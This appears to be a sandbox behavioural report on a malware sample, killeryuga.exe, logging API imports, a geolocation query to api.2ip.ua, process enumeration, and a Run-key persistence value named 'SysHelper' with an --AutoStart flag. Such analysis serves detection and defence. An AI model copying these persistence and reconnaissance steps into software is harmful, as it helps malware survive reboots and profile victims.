Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x753689b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75362d3c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75383102 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x75365444 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x75382a9d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x7537cf28 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x7537174d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x75365558 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x75364467 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x753634d5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x7538d526 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x7536495d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x753834d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x7537f481 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x753614e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x753654ee True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x7536dd0e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75488a29 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75489a55 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x754878e2 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x75489abb True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x754888f7 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75491361 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75487809 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7548b17d True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75490dfb True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x75487136 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75489679 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75493559 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776025dd True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x754dfd1e True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x754905ba True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x754dfd3f True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7548787b True 1
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x76f6369c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x76f6157a True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x76f5df36 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x76f614d6 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x76f6469d True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x76f77144 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x76f5ca4c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x76f5df4e True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x76f7779b True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x76f5c532 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x76f646ad True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76077078 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x75beb636 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75c186d3 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75c19d0b True 1
Module Load module_name = OLEAUT32.dll, base_address = 0x76b50000 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b53eae True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x76b53ed5 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x76b55dee True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x76b54af8 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x76b53e59 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x76b53f21 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x76b54642 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x76b5fd6b True 1
Module Load module_name = IPHLPAPI.DLL, base_address = 0x750f0000 True 1
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Module Load module_name = WS2_32.dll, base_address = 0x76b10000 True 1
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x76b1311b True 1
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x76b27673 True 1
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x76b1b131 True 1
Module Load module_name = DNSAPI.dll, base_address = 0x75020000 True 1
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x7502436b True 1
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x7503572c True 1
Module Load module_name = CRYPT32.dll, base_address = 0x751a0000 True 1
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Module Load module_name = msvcr100.dll, base_address = 0x74e80000 True 1
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x74e9c544 True 1
System Get Time type = System Time, time = 2019-03-24 05:39:08 (UTC) True 1
System Get Time type = Performance Ctr, time = 15114094153 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x753e410b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Inet Read Response size = 10240, size_out = 554 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Module Load module_name = Psapi.dll, base_address = 0x75460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
Process Enumerate Processes - True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Process Open desired_access = SYNCHRONIZE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Process #20: killeryuga.exe
Information Value
ID #20
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1416 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:23, Reason: Child Process
Unmonitor End Time: 00:03:41, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
Information Value
PID 0x7a0
Parent PID 0x588 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x7B0
0x6A4
0x6A0
0x33C
0x6AC
0x694
0x698
0x69C
0x688
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x002B43B0 0x002E3716 Marked Executable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Forced - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
Threads
Thread 0x7b0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-03-24 05:39:10 (UTC) True 1
Fn
System Get Time type = Ticks, time = 106533 True 1
Fn
System Get Time type = Performance Ctr, time = 15370031874 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
